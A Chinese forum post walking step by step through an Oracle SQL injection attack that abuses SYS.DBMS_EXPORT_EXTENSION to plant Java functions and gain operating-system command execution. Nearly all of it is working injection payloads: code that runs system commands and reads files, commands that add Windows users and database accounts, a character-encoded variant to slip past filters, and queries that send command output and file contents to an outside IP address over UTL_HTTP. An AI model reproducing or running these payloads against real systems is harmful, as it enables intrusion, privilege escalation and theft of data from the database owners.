
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
- ~/ q4 F# }! o" n( D' _6 h6 `3 e4 [# D
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 5 X. ^: o1 h$ i. T, Z, {
的形式即可。(用" 'a'|| "是为了让语句返回true值)
, @% [; D+ |7 Z4 [语句有点长,可能要用post提交。 % ^% i( A( A1 z+ B
以下是各个步骤: ; l  r; v% d9 o
1.创建包 + b1 v0 F2 c! ~: u0 N, ]& O' H
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:8 P, r) _$ F1 P# n
/xxx.jsp?id=1 and '1'<>'a'||(
6 U4 N2 v1 {: r9 [( c3 P& v$ \4 dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 A" ?! y4 n$ H' H" |5 W( Zcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader() b  D/ S7 j  {3 u2 L) V
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
4 U2 T; p9 d( L3 V: v1 s}'''';END;'';END;--','SYS',0,'1',0) from dual
1 t0 n# i# u6 ^" v3 s) t5 E) . f. \- u& w, V: e; `
------------------------
& ~6 c2 R6 q% C如果url有长度限制,可以把readFile()函数块去掉,即:
# `3 B0 q5 c5 M; F7 Z/xxx.jsp?id=1 and '1'<>'a'||( : y/ @( w# H  Q$ _
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! |% j- V: B% Q. x( x! s( Zcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(  T2 i( h; ]0 ]5 T. v- u; Z
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}' S/ B) r& z1 r2 |! M
}'''';END;'';END;--','SYS',0,'1',0) from dual
( M) Z8 @$ m7 z) 3 {! G9 d0 W9 g. s: a
同时把后面步骤 提到的 对readFile()的处理语句去掉。
3 R0 @3 D! `( ?& u, M# A  [------------------------------ 7 a- n; i5 q; [
2.赋Java权限
2 m  K  D4 T/ {; mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
* n- I$ _+ ?$ |- e# V3.创建函数
  m8 }6 m, j" l+ K2 a6 f( J. tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 _: H+ J2 x9 b* M8 G1 U4 ]
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
6 s. r% C6 A: J  zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 b2 Y9 ^; C. P
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual. v. |8 u6 i$ p. l/ x& S
4.赋public执行函数的权限
: J  T7 i1 Q. Z' j3 `% \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual) e+ t7 }6 i6 A7 [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual) x/ p0 }% o8 x4 k- F; ^! Q
5.测试上面的几步是否成功
2 U  i5 c9 c- P' O3 `and '1'<>'11'||( 0 }0 C; ^* l, ]$ _' S" q
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
4 W; N) e  o4 ^) " l" d/ R+ w! {1 V8 O1 P6 L+ H
and '1'<>(
6 W# O* W* m, }3 J/ sselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' & u" n# }' G# ]2 ], w( A/ r
) ( S! s* @2 j4 T( T& g
6.执行命令: ' k0 R# g% R1 m$ P
/xxx.jsp?id=1 and '1'<>( 7 G) x% O7 d9 d
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
2 S# P7 C) q( Y6 J) _+ ?
2 n/ o. [" _# s8 q) * o4 y( [* z- F6 d2 b  M9 |
/xxx.jsp?id=1 and '1'<>(
) z1 `( q/ B% V: b! k: i' Bselect  sys.LinxReadFile('c:/boot.ini') from dual
+ w3 z4 p) G9 ]8 I! C1 v! j. k; W% f
)
, J$ }1 M' n) A  + f& {9 t8 j4 z7 E) n
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ' X/ `  ?" d, N0 W7 n
如果要查看运行结果可以用 union : 4 _, v! R2 e/ r- v3 @( _8 Q
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
1 o3 i, y/ [- N或者UTL_HTTP.request(: ; f2 a$ m8 n. J$ j5 J$ z
/xxx.jsp?id=1 and '1'<>(
& j5 N( x; C+ ~5 cSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual' _* u. X  B8 P% E
) 2 r9 H! t5 f. ?" a* t% k5 S
/xxx.jsp?id=1 and '1'<>( 8 U1 U0 V+ n4 e$ L$ t" l4 ?
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
/ S3 i. }4 @2 L)
! g2 _3 y& g' b" G# _注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
+ k/ ^6 B& M* L1 @$ @% S5 R-------------------- 1 h8 x2 Y  f& C
6.内部变化
! p- b$ A+ P7 ?/ P3 }5 Y( `通过以下命令可以查看all_objects表达改变: , W# F2 L+ ?: w( w) H$ `
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'! u" B5 x$ [3 x- R$ o
7.删除我们创建的函数 * q- X$ Z% [1 h0 h1 n" S9 v5 m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 ^9 \4 ^. O1 c1 |4 L( P1 Q* I+ a
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
1 D0 m; b( A* x8 U6 v) ]====================================================
6 I. ?, D& w6 [6 d全文结束。谨以此文赠与我的朋友。 * n1 A8 J: v& ^$ j
linx
0 ]6 k7 P' i& B3 W( J" H0 Z124829445
* a, g# C5 \. y% l2008.1.12
) H+ I9 m) W+ E$ k* B8 K) a. P[email protected]
8 p, d- Q* o5 ]======================================================================
4 [+ f9 E1 |2 B2 }4 C' M测试漏洞的另一方法:
/ B+ O# U: H7 O5 V& b1 N" r2 W  y创建oracle帐号: ( A6 R$ s0 S/ t  `4 W% Q% q: @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''6 U2 v- c8 t) w" F
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual% \) ^, U# S* |; A; O0 N
即: : U& e" \: x) P+ O/ H- S9 n
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
  Z; O  i  Z5 E! E. lchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
- k& v! Q( e4 p% Y- G1 N  Z/ L! U确定漏洞存在: 4 R% W' t& S) P) S  c' G+ \. q& N
1<>(
) b% K, W% X# p/ R7 Fselect user_id from all_users where username='LINXSQL' - ^) a8 V- I  n5 a( U+ c
)
/ s( B- V- Q% Z* p2 h给linxsql连接权限:
. `! y0 [5 ?+ E9 I5 [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! S3 _0 O  F* ~; \$ P# [1 c5 m+ {/ G
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual & o) [# T. S6 s. I9 O5 \/ P- `7 Y
删除帐号: ; g& i9 G9 h$ J5 h+ m; f: b5 {
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! M. O7 E/ J8 H4 L6 e# z
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 6 B! P% @/ Z8 M: N$ g' q1 B) V/ b
====================== : v7 H  K; B3 g9 O/ g) L
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:+ H6 T: ~' i6 O
1.jsp?id=1 and '1'<>( ) [- v6 l- B" f) P. u  O( P) H# D
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 l. V' D: [+ E- n
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
, I$ Z2 b: {* q. k& v) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE  s7 Z% z# U  K
 ); ]0 Y. [( j$ A$ y- i$ W
6 M' G0 \8 F# \8 w

. T0 L0 f6 `5 s$ d) i
' Q) a& T" U1 D9 S3 N# x9 W